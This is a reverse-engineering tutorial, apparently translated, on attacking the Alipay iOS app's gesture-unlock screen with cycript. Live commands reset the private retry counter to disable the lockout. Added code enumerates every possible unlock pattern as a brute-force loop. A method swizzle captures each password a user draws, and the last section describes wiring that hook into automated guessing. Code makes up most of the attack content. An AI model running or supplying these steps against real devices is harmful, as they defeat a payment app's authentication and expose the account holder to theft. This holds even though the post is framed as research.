The previous post only covered how to use the tools. This one puts them to work: using cycript together with class-dump output to hack a running app, with the Alipay app once again playing the victim.
First, the usual routine: get hold of the view controller behind the gesture-unlock screen:
```
cy# var app = [UIApplication sharedApplication]
@"<DFApplication: 0x1666c960>"
cy# var keyWindow = app.keyWindow
@"<UIWindow: 0x16591bd0; frame = (0 0; 320 568); gestureRecognizers = <NSArray: 0x1b047000>; layer = <UIWindowLayer: 0x165d0650>>"
cy# var root = keyWindow.rootViewController
@"<UINavigationController: 0x179779a0>"
cy# var visible = root.visibleViewController
@"<GestureUnlockViewController: 0x165de090>"
```
Next, check the class-dump-z output to see what GestureUnlockViewController offers that is worth exploiting:
```objectivec
@interface GestureUnlockViewController : DTViewController <UIAlertViewDelegate, GestureHeadImageViewDelegate> {
@private
    GestureHeadImageView* _headImageView;
    GestureTipLabel* _tipLabel;
    GestureInputView* _inputView;
    DTButton* _forgetButton;
    DTButton* _changeAccountButton;
    int _retryCount;
    UIView* _guideView;
    id<GestrueViewControllerDelegate> _delegate;
}
@property(assign, nonatomic) __weak id<GestrueViewControllerDelegate> delegate;
-(void).cxx_destruct;
-(BOOL)shouldAutorotateToInterfaceOrientation:(int)interfaceOrientation;
-(void)headClicked;
-(void)gestureInputView:(id)view didFinishWithPassword:(id)password;
-(void)gestureInputViewFirstEffectiveTouch:(id)touch;
-(void)alertView:(id)view clickedButtonAtIndex:(int)index;
-(void)actionChangeAccountToLogin;
-(void)actionResetPswBtnClick;
-(void)resetCurrentUser;
-(void)resetPsw;
-(void)viewWillDisappear:(BOOL)view;
-(void)notifyFaceToFacePayReceivedData:(id)facePayReceivedData;
-(void)viewWillAppear:(BOOL)view;
-(void)breakFirstRun;
-(BOOL)isFirstRun;
-(void)guideViewClicked:(id)clicked;
-(void)viewDidLoad;
-(void)viewWillLayoutSubviews;
@end
```
Judging by the name, _tipLabel is the label that shows the account name and the "draw your pattern" prompt. As I noted in the previous post, @private does not stop key-path access: KVC resolves the path at runtime through the ivar name, so the compiler-level visibility is irrelevant. Let's change the user-name text on Alipay's gesture login screen:
```
cy# [visible setValue:@"Test By yiyaaixuexi" forKeyPath:@"_tipLabel.text"]
```
Alipay's gesture unlock limits the number of attempts: five consecutive wrong patterns and you are forced to log in again.
I wanted to lift that retry limit. The counter turned out to be the ivar `int _retryCount`, a plain scalar rather than an object, which at first looked like it ruled out changing it through KVC. (Strictly speaking KVC can still reach it: when setValue:forKey: falls back to direct ivar access it unwraps an NSNumber into the scalar, so setting the key `retryCount` to an NSNumber 0 would work too.)
Either way it does not matter, because cycript lets me write the ivar directly through the object pointer with `->`:
```
cy# visible->_retryCount = 0
0
```
With the counter pinned at 0, a program can brute-force the gesture password without ever being locked out. So how many possibilities are there? Let's work it out:
That number is a bit large for a human, but for the iPhone 5's CPU it is a trivial amount of work.
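The count the post refers to, worked through as an added example (this is not code from the original post): plain JavaScript, which runs under node and also pastes unchanged into the cycript console, since cycript is JavaScript underneath. It assumes a 3x3 grid with dots numbered 0-8 row-major and patterns of 4 to 9 distinct dots; the page does not say whether Alipay applies the usual rule that a stroke may not jump over an unvisited dot, so the `skipRule` switch counts both ways. `demoOracle` and `DEMO_SECRET` are constructed stand-ins for the call that would submit a candidate to the app.

```javascript
// Added example, not from the original post. Assumed model: 3x3 grid, dots 0-8
// row-major, 4..9 distinct dots per pattern, optional "no jumping over an
// unvisited dot" rule.

// For every ordered pair (a, b) two steps apart in a straight line, record the
// dot that lies exactly between them. Knight-like moves have no midpoint.
function midpointTable() {
  const mid = new Map();
  for (let a = 0; a < 9; a++) {
    for (let b = 0; b < 9; b++) {
      if (a === b) continue;
      const ra = Math.floor(a / 3), ca = a % 3;
      const rb = Math.floor(b / 3), cb = b % 3;
      if ((ra + rb) % 2 === 0 && (ca + cb) % 2 === 0) {
        mid.set(a * 9 + b, ((ra + rb) / 2) * 3 + (ca + cb) / 2);
      }
    }
  }
  return mid;
}

// Depth-first enumeration of every candidate pattern. visit(pattern) is called
// for each one; returning true stops the enumeration early.
function forEachPattern(visit, opts) {
  const minLen = (opts && opts.minLen) || 4;
  const maxLen = (opts && opts.maxLen) || 9;
  const skipRule = !(opts && opts.skipRule === false);
  const mid = skipRule ? midpointTable() : new Map();
  let stopped = false;

  function dfs(path, visited) {
    if (stopped) return;
    if (path.length >= minLen && visit(path.slice())) { stopped = true; return; }
    if (path.length === maxLen) return;
    const last = path[path.length - 1];
    for (let next = 0; next < 9 && !stopped; next++) {
      if (visited & (1 << next)) continue;                    // each dot used at most once
      const m = mid.get(last * 9 + next);
      if (m !== undefined && !(visited & (1 << m))) continue; // would jump an unvisited dot
      path.push(next);
      dfs(path, visited | (1 << next));
      path.pop();
    }
  }
  for (let start = 0; start < 9 && !stopped; start++) dfs([start], 1 << start);
}

// Number of candidates per pattern length: the "how many possibilities" question.
function countByLength(opts) {
  const counts = {};
  forEachPattern(p => { counts[p.length] = (counts[p.length] || 0) + 1; }, opts);
  return counts;
}

function totalPatterns(opts) {
  return Object.values(countByLength(opts)).reduce((a, b) => a + b, 0);
}

// Brute force: submit candidates in order until the oracle accepts one. On the
// device the oracle would feed the candidate to the app (with _retryCount held
// at 0 as shown in the post); here it is a constructed stand-in.
function bruteForce(oracle, opts) {
  let attempts = 0, found = null;
  forEachPattern(p => { attempts++; if (oracle(p)) { found = p; return true; } return false; }, opts);
  return { found: found, attempts: attempts };
}

// Constructed demo secret: top-left -> centre -> bottom-right -> middle-right.
const DEMO_SECRET = [0, 4, 8, 5];
function demoOracle(pattern) {
  return pattern.length === DEMO_SECRET.length && pattern.every((d, i) => d === DEMO_SECRET[i]);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(countByLength());                                   // per-length counts, skip rule on
  console.log(totalPatterns(), totalPatterns({ skipRule: false })); // 389112 985824
  console.log(bruteForce(demoOracle));
}
```

With the skip rule on there are 389,112 candidates in total (1,624 of them four dots long); with it off, 985,824. Either figure is the worst-case number of submissions the loop makes, and since each one is a single method call inside the process, the post's remark about the iPhone 5 coping easily holds.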
Hold on, though: what format is the password in?
```objectivec
-(void)gestureInputView:(id)view didFinishWithPassword:(id)password;
```
The password is typed as id. Very rigorous of them, and it adds a good deal of hassle for the hack: the header gives no hint whether an NSString, an NSArray of dot indices, or something else arrives here.
That's fine, though: we can use Method Swizzling to print out what password actually is. But that probably deserves a new article of its own...
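The swizzle the post defers, as an added example that is not part of the original post: it replaces the delegate callback from the class-dump above inside the live process, so every password the gesture view hands over is captured together with its runtime class before the real implementation runs. It assumes the process is attached with `cycript -p` as in the post, and that this cycript build exposes instance methods through `Class.messages[...]` (newer builds use `Class.prototype[...]`; the two lines marked below are the only ones that change). `captured`, `sel` and `original` are names chosen here.

```cycript
// Added example, not from the original post. Assumes an attached Alipay process
// and a cycript build with Class.messages[...]; newer builds use Class.prototype[...].
var sel = 'gestureInputView:didFinishWithPassword:';
var original = GestureUnlockViewController.messages[sel];   // or .prototype[sel]
var captured = [];

GestureUnlockViewController.messages[sel] = function(view, password) {   // or .prototype[sel]
    // `this` is the GestureUnlockViewController instance; `password` is the id argument.
    captured.push({
        cls:   [password class],        // answers the "what type is it?" question
        value: [password description],  // NSString, NSArray and NSData all describe themselves
        raw:   password                 // keep the object itself for further poking
    });
    // Hand control back to the original implementation so the app behaves normally.
    return original.call(this, view, password);
};

// Draw a pattern on the device, then back at the prompt:
//   cy# captured
```

Once the class and format are known, the same method can be driven in the other direction: call `[visible gestureInputView:visible->_inputView didFinishWithPassword:candidate]` directly for each candidate, which is what turns the pattern count above into an actual brute-force loop.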